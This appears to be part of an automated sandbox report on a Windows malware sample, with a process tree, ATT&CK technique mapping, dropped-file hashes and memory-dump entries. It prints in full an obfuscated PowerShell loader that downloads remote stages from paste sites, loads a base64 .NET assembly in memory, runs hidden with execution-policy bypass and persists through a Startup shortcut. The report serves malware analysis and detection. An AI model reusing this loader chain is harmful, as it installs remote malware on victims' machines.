        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        
        PID:4564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        
        PID:1764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        
        PID:4840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:2320
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:4356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:1148
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:4032

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

Filesize
418B

MD5
89c8a5340eb284f551067d44e27ae8dd

SHA1
d2431ae25a1ab67762a5125574f046f4c951d297

SHA256
73ca1f27b1c153e3405856ebe8b3c6cdd23424d2ab09c0fe1eb0e2075513057b

SHA512
b101ac2e008bd3cc6f97fedb97b8253fb07fed1c334629ecbebe0f4942ccc1070491cddc4daea521164543b6f97ba9b99d2be1c50cc5a013f04e697fea9dbdac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
22ec54dc5cf498a670cb9bd9292eff8b

SHA1
a3593cbc0762e27cff9546ef4b7471967916c64e

SHA256
689f20f6d8d90b45dd9eee10d8608b01e09a4e60cbc968cf47856ea4a609ee34

SHA512
81622e7cc04bff62580828c20dc8d0e36f02bba4414d4e4288484532fb5192466a2a3d1af4641b2faea894d83ca77dbca1dba527d1528a4d2f22587f2f39cc0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d2a7163f8573832b7460fb923c7369b6

SHA1
871a7e6184e2337a43722d09c38b5fcd9096258c

SHA256
106b873cf34c1d5e5a0a194e52fa7011f1951244ec4e72faec4d0364baa239a4

SHA512
ef4228a63a1f2d5225867b2cd9ba10a9110058db1a5c947dd2eb88b14b8b9610b1e7fce997242d1b4e716c9a2ab1732b6d6103e1353770c1ebcef9e24cca9265

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
52801a79d7a85d49459ee5185fc67c77

SHA1
1ca3842e7c238d65333a2a733af47d7ee5a51ea2

SHA256
0457a5575233abe01a3b9ee90529acb73e31676fd4190c08cd06c37387110177

SHA512
03781856cb0ac3d1ce99522e3e45a167ed7de443bf92bbdab0a0be321d575968279f3085fff448dce0663224c944e960e1839685ff18d9c96987f8a4cf975520

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e5ea61f668ad9fe64ff27dec34fe6d2f

SHA1
5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b

SHA256
8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466

SHA512
cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
049b6e9e5ae574090e37ec4f9cf48812

SHA1
8a84e30d1c55db18e6310ca185f14b8eeafa28fd

SHA256
3c8e60a138d954ca2ad15a5dab6ce592410983e0134b875a74c8041b3a575fd1

SHA512
fe854104d8b936c925a1a6b0b19ba3c5a0adebf9aa568cacc225dce64697bc3fd0a97e11cc065b5c48e27f195c22d8b4cc8221e16ac1ab7d8040d286540bb7b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
4a09939416d09072fdda27ca8dd7dc56

SHA1
80f274f4e481ddd822afd5bb4e51281115c81ac2

SHA256
d54cb88f4d90d7b6ca4d228d85ccddf636f85397f46984932363f60668e0ae68

SHA512
a1cbee1afcba8ef8779951e6c1be20c985cbddd476475d969d31ffb57e36e5c316a73972fe84ae9fe022d819580810dde36923695b7a7ea55d2d435799774323

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
9ebdc7a018d6dd58f14d725e61a37775

SHA1
c29de8efcac254e76525c24b776eb391a256d6b5

SHA256
6a43617d181df35ce2ddec0ad235141907e85f0db8c5ee77c30aff55533eb94f

SHA512
82f6435589c678b2ebc31dbfbab59a30bd167a34910170a9e4034d355f8318a78e99e4a0bf152cc1bc315995ec8a4a99f0cc73b60daf37654284a36ea0116eca

Download Submit
C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs

Filesize
8.5MB

MD5
fe73937416b78fff5aabab8506b32f60

SHA1
c87bb9695995735f37b46d10db49c0e75deaa26d

SHA256
a937e59c4e8f66f9c60c5725fa85bbd71e3a8fc32ade529ec7620ed81dd1126e

SHA512
231cdeed56ff52c687aba8ae417232402d09535256f68c964e4f503d0b9fb806fbc909dc6afb82f492c29887d74df9676f03913600024d5a8856737d5304e9c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c30xd10g.2eb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll01.txt

Filesize
34B

MD5
551de3894acfc565eaf2ea5fd7a7760a

SHA1
39a4d83c3d551deca48be49fda4a2d1824c084b8

SHA256
ff53ba58dd8ec7f149bd3aa6c14b60baf059d46cc0b312f234858710f6c3635f

SHA512
5545f75a3c632756807a6dbeec49af2f645ae295d27f0df0c4205b505baadf8d5b5057a0fb95a6edc79bbd2c561e619c8c3e2c707d09b8354285c9ef735f3e8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll02.txt

Filesize
300KB

MD5
1ed4ff6b14c799919ea5baaa9a01134d

SHA1
8d498985e857c1ec16c9f0b05cae4d684fb145da

SHA256
6d7cfe7ef865d8a7f4cee574736cf8ccf1b5dcba1c3c3b48a50498038921b384

SHA512
2ae2eab2f09e7499a8e078e35765868d5d8ca77e59ecb97c46700f7d2c4d324f438b63a81084de5ec484efa9383775688726136a8a02c82b0c0d9c1852ae5c1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll03.ps1

Filesize
954B

MD5
f241db867069d3cc3d3b8ad4a5a5ba76

SHA1
9367de52fd6814d04d347ea24f34565b8a20fe1e

SHA256
87b8717a73979beecefaeaae3ef930d03b46bf8a6a8dbde10dd30caf3b834983

SHA512
67be89687762c96ffc76d5ef8e01a2fc406a7d8c06eb5a3fe7f7255e8ec2bb3bc6a1b36fb1eb017248639d1174cc7d76b0030be6c3054c9a5ad8be0d16bd8324

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll03.ps1

Filesize
1004B

MD5
aeb9fa2ee90c36ca4fad9df9a54ddd2f

SHA1
f2eaab81bc15619cf54e75cbeb70d76962bc2951

SHA256
90efc276e7a7e9b3110459daa31db903b84806582d6ac26f12be2ea53ed15fa6

SHA512
a412720e0230becca07611b7433f5e32982097c7182584ad321d7d5ea1495fddd61debc2ec01655ea78caaaf3a78b8f061acd61aa7da8b6ab7b4d6d1a70e75ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx1.ps1

Filesize
282B

MD5
b094f227c79abfc0903a9b305203075a

SHA1
fd0fc367d2ef0027cf935264da182389db464e5b

SHA256
0c3a5a7559e7c46a0769022433588e0db2fa750d2c871c6909332a6719f61833

SHA512
5a4202474e5f71318d95717ed4fc6887e3c5aff0aa98c951a426ad12a8a842add837b52ee99bef93f8a37a7b741c00a8e6f3979d76be4c2a92dbefb95631e129

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx2.vbs

Filesize
199B

MD5
352effa45dac5eab28272c4f2bb0664d

SHA1
d515005c6857fe06e9332d5284e04a36d038b91b

SHA256
c6ec062fcf3398ad14e32861c892b1b8271f663e49a6c9b3ee9771da231d849b

SHA512
a642d422da1295b09089dc2602651075611b4719aa653f8cefa0caf578bb7d1051dd150b4e7e51ab2dbdd8588937d2ecf5331e3759e594cc3672d9b9ab72d23b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk

Filesize
1KB

MD5
ac6c05652b75b73b6d7583e17ed746ae

SHA1
ba134306bd5060e9ef97c9adad5970270385d1d8

SHA256
532178a9c1450fab77de7383543d3e766d034b8b719851b73747f86cfdc2eb98

SHA512
b6dc4692db742de234fcbc84f2de99365e450bd62f0a37d1f50ff0ccf36377b909af730ac4e9263fd636682e8d4cccd5e8605bb3d3149ba98ae948572de067a6

Download Submit
memory/212-908-0x0000020DEB310000-0x0000020DEB326000-memory.dmp

Filesize
88KB

Download
memory/856-1605-0x0000019D08770000-0x0000019D08786000-memory.dmp

Filesize
88KB

Download
memory/1188-2702-0x00000172F3E10000-0x00000172F3E26000-memory.dmp

Filesize
88KB

Download
memory/1412-143-0x00007FFA57CD0000-0x00007FFA58791000-memory.dmp

Filesize
10.8MB

Download
memory/1412-1-0x00007FFA57CD3000-0x00007FFA57CD5000-memory.dmp

Filesize
8KB

Download
memory/1412-13-0x00007FFA57CD0000-0x00007FFA58791000-memory.dmp

Filesize
10.8MB

Download
memory/1412-12-0x00007FFA57CD0000-0x00007FFA58791000-memory.dmp

Filesize
10.8MB

Download
memory/1412-7-0x0000022AC1070000-0x0000022AC1092000-memory.dmp

Filesize
136KB

Download
memory/2216-2503-0x00000241B50F0000-0x00000241B5106000-memory.dmp

Filesize
88KB

Download
memory/2296-162-0x000002502FBF0000-0x000002502FC06000-memory.dmp

Filesize
88KB

Download
memory/2296-256-0x0000025030AA0000-0x0000025030AB4000-memory.dmp

Filesize
80KB

Download
memory/2596-145-0x0000000005600000-0x0000000005BA4000-memory.dmp

Filesize
5.6MB

Download
memory/2596-263-0x0000000005110000-0x000000000511A000-memory.dmp

Filesize
40KB

Download
memory/2596-255-0x0000000005170000-0x0000000005202000-memory.dmp

Filesize
584KB

Download
memory/2596-137-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/2596-144-0x0000000004FB0000-0x000000000504C000-memory.dmp

Filesize
624KB

Download
memory/2732-1906-0x000001DD9E810000-0x000001DD9E826000-memory.dmp

Filesize
88KB

Download
memory/2916-510-0x000001C1BF3E0000-0x000001C1BF3F6000-memory.dmp

Filesize
88KB

Download
memory/3000-1305-0x00000265DD720000-0x00000265DD736000-memory.dmp

Filesize
88KB

Download
memory/3080-1705-0x000002245E5D0000-0x000002245E5E6000-memory.dmp

Filesize
88KB

Download
memory/3852-2205-0x000001854A0D0000-0x000001854A0E6000-memory.dmp

Filesize
88KB

Download
memory/4132-38-0x000001EA3D830000-0x000001EA3D846000-memory.dmp

Filesize
88KB

Download
memory/4132-136-0x000001EA56900000-0x000001EA56914000-memory.dmp

Filesize
80KB

Download
memory/4136-2006-0x0000025F02440000-0x0000025F02456000-memory.dmp

Filesize
88KB

Download
memory/4844-610-0x000002C44EC90000-0x000002C44ECA6000-memory.dmp

Filesize
88KB

Download
memory/5020-487-0x0000019E35B30000-0x0000019E35B44000-memory.dmp

Filesize
80KB

Download
memory/5228-1888-0x000002AE52D40000-0x000002AE52D54000-memory.dmp

Filesize
80KB

Download
memory/5228-1805-0x000002AE399D0000-0x000002AE399E6000-memory.dmp

Filesize
88KB

Download
memory/5684-1505-0x000002A90C0A0000-0x000002A90C0B6000-memory.dmp

Filesize
88KB

Download
memory/5808-1405-0x000001D2C71F0000-0x000001D2C7206000-memory.dmp

Filesize
88KB

Download